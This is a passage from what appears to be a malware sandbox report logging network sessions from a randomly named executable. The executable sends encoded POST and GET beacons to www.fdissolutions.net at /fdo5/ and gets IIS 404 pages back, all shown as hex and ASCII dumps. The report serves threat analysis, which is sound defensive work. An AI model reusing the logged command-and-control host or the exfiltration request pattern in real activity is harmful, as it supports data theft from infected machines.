61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f
                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are loo
                                                                                              Dec 3, 2023 16:26:33.548136950 CET193INData Raw: 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61
                                                                                              Data Ascii: king for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              7192.168.2.449747109.68.33.25802492C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Dec 3, 2023 16:26:36.063855886 CET10835OUTPOST /fdo5/ HTTP/1.1
                                                                                              Host: www.fdissolutions.net
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Origin: http://www.fdissolutions.net
                                                                                              Referer: http://www.fdissolutions.net/fdo5/
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Cache-Control: no-cache
                                                                                              Connection: close
                                                                                              Content-Length: 10287
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Data Raw: 35 34 30 48 32 78 3d 76 6c 41 49 67 43 6a 6d 48 42 61 61 6c 68 74 44 57 48 53 51 51 6d 49 79 56 76 64 61 76 50 37 4c 51 6c 7a 55 63 48 7a 73 73 76 67 30 77 66 4a 41 30 58 4c 42 79 4a 42 50 4b 47 65 39 71 32 58 39 6c 66 54 4d 6b 45 68 73 7a 38 55 46 4e 74 66 74 4c 50 31 4a 77 79 51 6d 7a 7a 76 79 39 53 6c 65 4b 5a 44 52 31 68 56 50 33 45 74 34 63 57 50 46 41 61 5a 64 4f 4b 52 52 43 67 36 72 52 57 56 4b 67 74 7a 53 53 39 6e 71 49 4d 32 6f 70 45 55 69 68 4c 5a 32 69 41 5a 56 2f 50 37 2f 4a 37 62 46 77 44 72 4e 4e 69 66 31 36 70 41 36 77 76 58 6f 4e 59 57 30 32 65 4a 45 46 62 64 6a 48 44 30 36 78 66 75 5a 2f 56 6b 55 44 58 62 67 57 54 52 41 67 67 77 6e 74 55 75 31 38 32 34 36 30 6d 38 32 7a 70 79 4d 34 53 43 4e 58 67 72 37 37 6b 47 45 64 65 53 6b 70 73 61 51 41 6e 4f 45 6d 47 38 76 71 30 51 39 46 79 38 33 77 6e 44 4f 46 4e 36 53 54 38 55 44 59 56 36 59 36 36 53 4d 57 69 4d 4c 54 52 75 2b 36 6b 48 37 65 2b 38 2f 4a 75 6c 73 66 4f 36 74 64 76 52 54 46 45 6b 42 30 4f 35 38 6b 65 45 4a 79 73 39 2f 58 36 76 2b 65 52 38 6a 65 36 42 73 73 32 33 76 68 43 68 69 6f 52 4b 42 67 58 4a 74 68 50 77 4c 59 4e 58 32 51 55 53 5a 6f 63 5a 54 59 47 36 53 4a 6e 35 68 61 4e 2f 55 45 67 35 45 2b 49 69 56 45 2b 31 75 47 66 34 4c 76 56 4e 78 50 6c 42 56 6a 52 6e 46 36 5a 43 6e 43 32 68 78 44 6b 34 2b 42 35 48 51 76 36 44 70 75 64 43 6c 74 54 53 37 6f 69 74 32 77 2f 4a 37 67 76 51 38 38 45 43 57 62 6d 77 45 78 67 59 69 38 70 5a 35 4a 6d 78 30 4a 72 6f 71 44 5a 79 54 4a 48 5a 44 68 75 32 72 49 65 65 45 79 78 45 6f 61 48 4e 5a 49 72 69 61 48 4e 67 68 39 37 44 52 62 62 73 71 64 4b 53 78 46 53 54 43 6e 4b 78 59 67 76 61 4d 31 57 72 34 32 78 62 6f 63 43 56 45 50 4b 45 54 69 52 64 37 79 52 69 73 70 66 6c 62 43 2f 70 39 41 32 43 46 51 37 51 31 47 6c 39 2f 53 2b 47 50 58 45 63 30 64 36 41 5a 5a 52 38 4b 76 31 4c 62 53 5a 35 70 6a 69 74 79 66 6b 41 6d 77 61 53 44 6f 32 33 71 66 78 64 77 72 39 66 53 32 69 7a 78 57 6c 65 39 51 58 55 65 66 62 74 75 42 77 32 67 66 48 56 42 70 43 46 75 78 39 63 46 59 4d 42 4d 49 6d 79 4c 6e 51 35 48 7a 58 30 49 72 74 69 4e 32 59 42 2f 62 33 4c 70 4c 6f 56 49 6a 45 5a 57 64 55 38 77 63 41 64 75 50 62 6f 6e 58 5a 77 37 39 51 6d 75 38 42 49 56 57 55 38 6c 69 41 6b 75 64 6f 59 55 51 76 74 71 36 47 45 6c 73 54 55 61 63 47 66 57 78 6b 4b 30 37 63 41 5a 50 4e 57 6e 67 77 59 73 72 74 6f 45 30 53 34 6e 4a 45 6f 42 62 66 44 53 47 4f 6d 67 78 45 32 53 48 31 72 78 6d 48 4d 75 44 35 71 57 51 63 6c 36 54 30 4a 49 50 37 36 2b 30 67 52 55 55 39 53 47 75 50 72 53 35 71 59 31 58 63 68 79 30 4c 61 53 59 46 41 37 64 43 35 75 4f 47 75 39 38 54 6b 78 55 6c 6d 50 37 79 31 69 4a 64 51 52 7a 62 5a 48 55 35 75 32 48 79 51 42 65 4a 41 62 48 68 43 63 55 59 38 66 31 38 62 65 77 51 55 45 2b 4f 6c 69 39 4c 76 79 49 44 43 45 51 75 4f 72 76 30 34 69 6c 2f 31 38 77 4f 52 47 4a 4e 68 58 37 79 49 31 71 4b 77 4d 54 47 51 6b 34 49 4a 59 4e 32 56 78 73 33 48 51 49 59 61 6a 76 48 71 33 49 55 77 4c 6e 75 64 69 63 4b 70 77 54 4d 4b 54 54 5a 45 4c 49 68 43 6d 75 51 46 41 46 31 36 6f 52 71 6d 41 4e 4f 5a 6e 46 49 38 59 57 6e 53 4e 43 6b 31 78 63 72 64 5a 61 42 4d 4e 38 6d 4f 6b 6d 4a 69 56 4e 35 4a 41 41 70 62 32 35 54 58 63 70 51 4a 78 64 38 35 61 39 6e 76 42 47 39 6f 68 2b 6b 74 4e 2b 31 72 79 74 74 4b 44 36 39 39 6a 37 44 47 62 69 4b 58 66 78 72 56 57 59 61 56 33 6a 33 53 6e 74 4f 4c 42 56 50 75 74 62 30 43 36 51 32 45 41 65 57 78 49 49 54 67 2f 36 31 43 6b 41 69 54 2b 49 4a 2f 51 33 66 6f 42 7a 42 36 6e 30 35 55 37 39 41 62 41 75 5a 45 41 54 64 70 31 75 56 71 74 4c 31 75 44 7a 42 79 2f 71 38 48 6b 73 44 31 75 65 4d 4b 68 51 56 6c 74 4c 62 51 41 76 49 39 72 4b 33 30 64 43 4a 44 63 72 52 53 74 71 4f 72 52 39 4b 7a 6a 2f 54 6d 58 6d 4b 44 71 52 52 2f 71 32 70 70 6e 43 41 55 77 36 6b 4d 43 32 38 63 30 42 47 73 4f 45 67 58 79 48 64 35 4d 53 33 49 45 4f 4a 6b 4d 4d 77 55 68 56 34 33 6f 38 33 6a 50 59 31 51 6b 36 76 35 62 72 36 39 4d 38 59 59 73 63 4a 79 43 53 63 56 51 53 6d 4b 35 33 6f 76 73 62 73 41 52 68 33 41 75 75 63 45 38 2b 31 55 6a 2b 76 2b 31 46 6c 44 4a 34 55 43 37 55 61 63 41 32 49 4a 35 74 36 68 79 30 79 65 49 34 73 72 75 76 54 52 4f 36 6f 38 6a 33 39 49 5a
                                                                                              Data Ascii: 540H2x=vlAIgCjmHBaalhtDWHSQQmIyVvdavP7LQlzUcHzssvg0wfJA0XLByJBPKGe9q2X9lfTMkEhsz8UFNtftLP1JwyQmzzvy9SleKZDR1hVP3Et4cWPFAaZdOKRRCg6rRWVKgtzSS9nqIM2opEUihLZ2iAZV/P7/J7bFwDrNNif16pA6wvXoNYW02eJEFbdjHD06xfuZ/VkUDXbgWTRAggwntUu182460m82zpyM4SCNXgr77kGEdeSkpsaQAnOEmG8vq0Q9Fy83wnDOFN6ST8UDYV6Y66SMWiMLTRu+6kH7e+8/JulsfO6tdvRTFEkB0O58keEJys9/X6v+eR8je6Bss23vhChioRKBgXJthPwLYNX2QUSZocZTYG6SJn5haN/UEg5E+IiVE+1uGf4LvVNxPlBVjRnF6ZCnC2hxDk4+B5HQv6DpudCltTS7oit2w/J7gvQ88ECWbmwExgYi8pZ5Jmx0JroqDZyTJHZDhu2rIeeEyxEoaHNZIriaHNgh97DRbbsqdKSxFSTCnKxYgvaM1Wr42xbocCVEPKETiRd7yRispflbC/p9A2CFQ7Q1Gl9/S+GPXEc0d6AZZR8Kv1LbSZ5pjityfkAmwaSDo23qfxdwr9fS2izxWle9QXUefbtuBw2gfHVBpCFux9cFYMBMImyLnQ5HzX0IrtiN2YB/b3LpLoVIjEZWdU8wcAduPbonXZw79Qmu8BIVWU8liAkudoYUQvtq6GElsTUacGfWxkK07cAZPNWngwYsrtoE0S4nJEoBbfDSGOmgxE2SH1rxmHMuD5qWQcl6T0JIP76+0gRUU9SGuPrS5qY1Xchy0LaSYFA7dC5uOGu98TkxUlmP7y1iJdQRzbZHU5u2HyQBeJAbHhCcUY8f18bewQUE+Oli9LvyIDCEQuOrv04il/18wORGJNhX7yI1qKwMTGQk4IJYN2Vxs3HQIYajvHq3IUwLnudicKpwTMKTTZELIhCmuQFAF16oRqmANOZnFI8YWnSNCk1xcrdZaBMN8mOkmJiVN5JAApb25TXcpQJxd85a9nvBG9oh+ktN+1ryttKD699j7DGbiKXfxrVWYaV3j3SntOLBVPutb0C6Q2EAeWxIITg/61CkAiT+IJ/Q3foBzB6n05U79AbAuZEATdp1uVqtL1uDzBy/q8HksD1ueMKhQVltLbQAvI9rK30dCJDcrRStqOrR9Kzj/TmXmKDqRR/q2ppnCAUw6kMC28c0BGsOEgXyHd5MS3IEOJkMMwUhV43o83jPY1Qk6v5br69M8YYscJyCScVQSmK53ovsbsARh3AuucE8+1Uj+v+1FlDJ4UC7UacA2IJ5t6hy0yeI4sruvTRO6o8j39IZ6t9GUIWIN4G8SAOscFCq7auSPAAnuJhvp1NsqbSxDUfmeEwgsGBcocyca1ZC7REDZPBgMdh6cCMCO57EZqON193fIs0KHnBrfuoUw8M5Mf+PIy/Sh9H2uC+QlysagCVU8SdlKYl0SiKGIkyD68DjPfJJOFy9UKOROy5KrQxrRdcREYfQCRqebuFUNxH5eaXBc636JDCe3cFenMacPvU+mnhOV7d3zGxWxPQlDInK3AXtkwUerADg/i0dpuYWz3/heETpHenv64is0WfEJusk7cZ7SeynGJGFqJMuGBtPeGTRMuFnaEi/6djQa+lwz2Wa9TGktXOWDHSHwBVSJCDskBIrPHNaEozVGhsfsRBxXU6r+TrXDp55Nj4X1MwO5oLUjQMErQSkIM4jUQUl8soEg+Fy9szZgDtzK8OpyLZkLYLEoMA4Q/9PnTaAkx96HVxRifD55SdHpFNpSve2PB/GeYiYoBHjLRf0d5CK7QIjO8B4uPLX0Ej94WEVM0jdMDrsVT/J5zOrY1K9PKhnUP2fMlL+aEm8kipbTjDk+cVgI0b2t8M1mrJN0J+ZJYfo1mcJNrEYVwXVzCNiw7Z7f2TGAVl5NwuRHBy4ImOsaKRz245ZnR0Chs/p+vRdR+N1XG8S3R7hFi3UXFFvCbk1DpBM+Ov0AwdUuRMGgvcfLZJYEW7dDeH2SRGEZptRhyP9qGuJOOaPzAFmBX4e9M0a/Y05ZSieAw9OHOwsN+w4tvj3cgbRJHK11546WXdTYwqpj+/l1feEYZgk82KfCicFUDhjgQmx5s3C5kKltPfE5ew0hYjR2AkuNzn56J4S+9R/QAuBPAHTu90vF3ihiX7tpmFs9J7NUCvoGQ5WbwULS0GP89Rsg6HpUslpn2BQ8kTyBcx2LpylJnwTRQJuO2JXSdq16SI38sMFmdzxiEVonqzR6y8S5hDefhk0QdsjVDx9kXBQCGNPD0NXdbPbuB4WR6iJPx07JT2+vDvtd83d7WNZ5kppwSzIHJQJ6ujfPRmEAjibvM/mrt3W0lCYXbvE3UFyNphyIfoOfoTn1tmlciTF/NFLWpLgVYeB+rXBb0pupA5l0vUXna/l2Ol8W6u9cFJUBXBEcCpq2RZkXhXglEOBcAcA4kLp+dLnQukYsb3Gadj8AYVpl5sHmDmnQgC6+xyPUS+snj67LM+s2PmLS6wKzk3EigkMTG9vfxLHMtrScjQxivBjqoP9+THvNP68Gq5Gwomdw6eHGLZqAG/PG/RE3X9+4SVHpC5f/ZpXqL+CTPZ+5xwiFkjZILcUVGft+8oURIPw1QXIb+EZUgb+8xUpxB0MuZvzLFvA0qa8lcLmmMT/dFdIsHsCtRy5GgjRBJchSoShulWXR9bbc4G/48m04JvOcrNMvsopq15HxgvKfD70e+ESCRPgz1LNwdOw/EqnviE33NLQyXhMbH+c+xf/eDzeMrNhgFYYjV3TdIp3Pfa4ZYx6pfhKCA1/+gpaoK3k+hG4Y8fSZxDyGDzlP4Xm93YpuVLVVlOPqDpC/PGdzk2f4b0/l2yWphS+5A+bdtTSZfKNdk/m8awtL0VhViBo39ZneX6V95+0/NU5TinFF0PcwOkVW2aOIn35637fxwwIiJHH90kfRwYKxxqBYFhRZYIToXGpAGf1eQs+1GCPS3GzxqqRztOuoDMXn6r41/2wunv9CkXB7nmuXKrwVLXjcsCmuijBy4mSWbEHX+PfFvv77iGwULf/0JCWkDSqgVyxGkBBDNRzA65I2fS8xs0NXNSm1ivZ43vU1v3F4o/y7vLaWBKvlSMHbjzYlB1tetdkMNqlxo/nP+VyxO018Z3WJiHLhlRBc1i+EWON8qfcvQSS6PQAjIHZmYDHBVueX8rPUDKOBkgmN0aquPe/tYVb7uHDDsGO77lUBbSytp3uVS848cFFBuouhjJPIF1jJyVU51AKdAK3cH6xd9VjX6mctdfwmXUs8A/zzZfSgMPCx7+lxIkhO9sy+qen3G+pIpq8Sd4F9H1RQo7AoG7anZ0b7/nVXNgjGsjZBC7DvrOxTMt1KiBB2UqyANeCTFj4DZ3ijShwvfakieEiW8+GlwSXrT+TYr39YPwFLtq929fnArIuKeAj+XGnU+gd9zt+0Rqx3sCiYp36h2JgNZWOo215m7IpeR04MxEtydLGb3urSUHugVI/2MCY4kJGA9JqmqJ+ZH3JtK+UpWsF8V+9hYsILt9gbDDsn7QNMZ+UkIk8yiun13SDWh82TYeQeLWtqjt5sCrOM/vTM733rhupCCZyaeyKMWo2AoUZLGlJLHZwYuktYv/HAELYXSiOwnmPk21MT+JLch2qUtyzfhaTLFkMktClS1C9XHDVRg4rVIGdfILjxxYWKWn/3f84xhQu5e0IB+TwLQss/S7kYb3ooSxZA2odBAqln17PZknh44kZeQngOnN3zSsHFV0hOiCZtHlj9W5rPWXF2cbl/u8VIVV7tmqkHDhqFrszjkkAI3AbVLwaANV5IAxUIeKrEgu467S9Ajjwilb4xhbsHAvQptdaLRnkRs5CqGrAmEq/w6egntItPbHITwbt3X71JWVNI8RBsp69F8akjT7c3e+Khw90TGdcCzzT+7agTNliKuU8JaiXqTW42G34AGrXN926M2YIpAfJdakSTTMRkZeLD/j+8sCarjxo02EW1Ti4ezZZcVfRqhmq9mqNJJINHE7dxexUBa2H0T0AkvxWN3z
                                                                                              Dec 3, 2023 16:26:36.247498035 CET1340INHTTP/1.1 404 Not Found
                                                                                              content-type: text/html
                                                                                              server: Microsoft-IIS/10.0
                                                                                              x-powered-by: ASP.NET
                                                                                              date: Sun, 03 Dec 2023 15:26:35 GMT
                                                                                              content-length: 1245
                                                                                              connection: close
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f
                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are loo
                                                                                              Dec 3, 2023 16:26:36.247513056 CET193INData Raw: 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61
                                                                                              Data Ascii: king for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              8192.168.2.449748109.68.33.25802492C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Dec 3, 2023 16:26:38.894529104 CET464OUTGET /fdo5/?fXUX=ShJ8DFcXvtj84pw&540H2x=inoojyPYY1WC9wcQL3KibnMAdvhtstHROTevXGeSx6okq+Nf2nPGtK9KaHajuwb+0LfF1HdY3MAFMtPUKPMp3iU3/gDoogh+Wg== HTTP/1.1
                                                                                              Host: www.fdissolutions.net
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Connection: close
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Dec 3, 2023 16:26:39.164745092 CET1340INHTTP/1.1 404 Not Found
                                                                                              content-type: text/html
                                                                                              server: Microsoft-IIS/10.0
                                                                                              x-powered-by: ASP.NET
                                                                                              date: Sun, 03 Dec 2023 15:26:38 GMT
                                                                                              content-length: 1245
                                                                                              connection: close
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 